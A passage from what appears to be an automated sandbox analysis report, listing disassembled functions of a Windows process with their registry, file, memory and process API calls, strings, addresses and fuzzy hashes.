                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseValue$CreateDeleteOpen
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%s$\Shell\Open\Command
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4081037667-3301834661
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 05a6d1af7b12b65e0dc98f17feca41036cc755b203abc22f34389036769b35f9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 83443da9585c52eda7aaca91b29ceafbb7130e953e366cec5cbd78ae3b4121be
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05a6d1af7b12b65e0dc98f17feca41036cc755b203abc22f34389036769b35f9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A611E75E40125ABDF359B28CC49AFB77FCEF59700F1482A9E809D7240DE328E84C6A1
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000364DB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0003CD00,00000018,?,?,0002BFD6), ref: 0003650F
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0003CD00), ref: 00036545
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0003CD00,00000018,?,?,0002BFD6), ref: 00036553
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,0003CD00,00000018,?,?,0002BFD6), ref: 00036590
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,0003CD00,00000018,?,?,0002BFD6), ref: 000365AD
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,000120B8,?,00000000,02000000,?,?,?,00000000,00000000,0003CD00,00000018,?,?,0002BFD6), ref: 000365D4
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,0003CD00,00000018,?,?,0002BFD6), ref: 000365EF
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseDeleteValue$CreateOpen
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%s
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1019019434-1087296587
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 81d47dbe172769ea1db1f0b98ba8087f4e1997e650c2ce4ef9caf5ff0f7b9765
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b2c3325e0336fad9e633643b8e82166c1d73acb684ad495bca596a3d5f2ec394
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81d47dbe172769ea1db1f0b98ba8087f4e1997e650c2ce4ef9caf5ff0f7b9765
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0641C771D04615BBDB325B58DC0AEEF7ABCEB8AF50F004129F80577251D7274D01CAA1
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00017150 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmpswscanf
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :EOF
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1534968528-551370653
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6daa88cfe1edc98925232916941acd01ee6d4405698f54272707dfde85e6017c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1b624954349fc06132b0a4a9b8c4faf74d72a960d10f3631981b40efb87b7152
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6daa88cfe1edc98925232916941acd01ee6d4405698f54272707dfde85e6017c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30314831608220BBEB606B58AC45BEA77F4EF47711F044415FD8A97291DB388CC2C765
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00036035 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 113libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 00036069
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 0003607E
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000480,?), ref: 000360DC
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 00036128
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 0003614F
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 00036186
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1580871199-2613899276
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0b7407c0538c50e894bde0a96a706be68d568c885346ffd652b2f3a878c34e64
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cd4669f8d4efdf3dba7b91e73607418a945ce34fa079b4c4df589e1190d69094
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b7407c0538c50e894bde0a96a706be68d568c885346ffd652b2f3a878c34e64
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A41A4B0A00219BBEB259B24CC85FBF77BCEB41745F0485A8A605E3281DB349E45CF69
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0002654B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 000265A4
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 000265D7
                                                                                                                                                                                                                                                                                                                                                                                                                          • _open_osfhandle.MSVCRT ref: 000265EB
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00032092
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: con
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 689241570-4257191772
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 85eb9818da55dde471b33fa6662074e47b8b10f798a2ed9a7c2e76ec1079823a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e3f7181556a6cc08eb1306549058224f08696bc83bd7555b93afdd2ed54f3300
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85eb9818da55dde471b33fa6662074e47b8b10f798a2ed9a7c2e76ec1079823a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D312672A04724AFE7249BA8AC49B6F7AA9EB46735F200329E412E31C0DB799D408751
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000361A2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98memoryfileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 000361D7
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 00036211
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 00036254
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0003625B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 0003628D
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 00036294
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 0003629B
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: PE
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3093239467-4258593460
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 59a9c03bcfcf8957a47c19629765ae71982d6de655ea3883e50c3209e4179337
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 867bc59da1750ce3c029209a8630752a8986bdb6757a8032fec1978ab1f26a33
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59a9c03bcfcf8957a47c19629765ae71982d6de655ea3883e50c3209e4179337
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F031E534700B04B6EB126BA18C49FAF77ADAFC9B11F068204F911E61C0DFB5C906C665
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00018F21 Relevance: 13.9, APIs: 9, Instructions: 389COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00018FCD
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00018FE3
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00019002
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00019013
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A62F: wcschr.MSVCRT ref: 0001A635
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp$AttributesErrorFileLastwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2943530692-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f473fcafa577fa5d16ba1ca6053241d24b9f8e26e6d243a6bc19657f08e0d35a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6c0d43c24c5edca7cf2f41e4cec6e904e4d0ccdd1e7bfca9b843728b49d290d5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f473fcafa577fa5d16ba1ca6053241d24b9f8e26e6d243a6bc19657f08e0d35a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98C12531B003229FDB659F7898956FEB3F5AF48310F24852AE906D7281EB749DC1CB91
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001802C Relevance: 13.7, APIs: 9, Instructions: 175COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00018060
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,00000000,?,00000000), ref: 000181BE
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,-00000001,00000000,?,00000000), ref: 0001818C
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00018197
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001,-00000001,00000000,?,00000000), ref: 0002B09E
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00037FC9,?,000399AE,00000000,?,00000000,0002CF94,00000000,?), ref: 0002B0AB
                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00037FC9,?,000399AE,00000000,?,00000000,0002CF94,00000000,?), ref: 0002B0C1
                                                                                                                                                                                                                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 0002B0D5
                                                                                                                                                                                                                                                                                                                                                                                                                          • fflush.MSVCRT ref: 0002B0E3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018F21: _wcsicmp.MSVCRT ref: 00018FCD
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018F21: _wcsicmp.MSVCRT ref: 00018FE3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018F21: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00019002
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018F21: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00019013
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00058BF0,00000000,?), ref: 00018EC3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D3A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D44
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D57
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D61
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000201F5: wcsrchr.MSVCRT ref: 000201FB
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Error$Mode$AttributesCriticalFileHeapLastSection_wcsicmpmemset$AllocCurrentDirectoryEnterFullLeaveNamePathProcessfflushfprintflongjmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3753564779-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0c9d8f666a2167cadb844b42bb46195dc09a2007eed4f436d6c44375aa888d3c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 17eea84611dcce643931cb26e0532cad64bad7ea9a6c92f3af972c1a17cf2a17
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c9d8f666a2167cadb844b42bb46195dc09a2007eed4f436d6c44375aa888d3c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A351D271B00221ABDB249BB4EC5A6EF77F9EF08710F144529F905D7292EB748AC1CB51
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00038B6C Relevance: 13.6, APIs: 9, Instructions: 93fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00038B7B
                                                                                                                                                                                                                                                                                                                                                                                                                          • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00039323,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00038B83
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A16C: _close.MSVCRT ref: 0001A19B
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00038BB5
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00038BBD
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00038BCF
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00038BD7
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,?,?), ref: 00038BED
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002654B: _wcsicmp.MSVCRT ref: 000265A4
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002654B: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 000265D7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002654B: _open_osfhandle.MSVCRT ref: 000265EB
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002654B: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00032092
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00038C1A
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00038C22
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
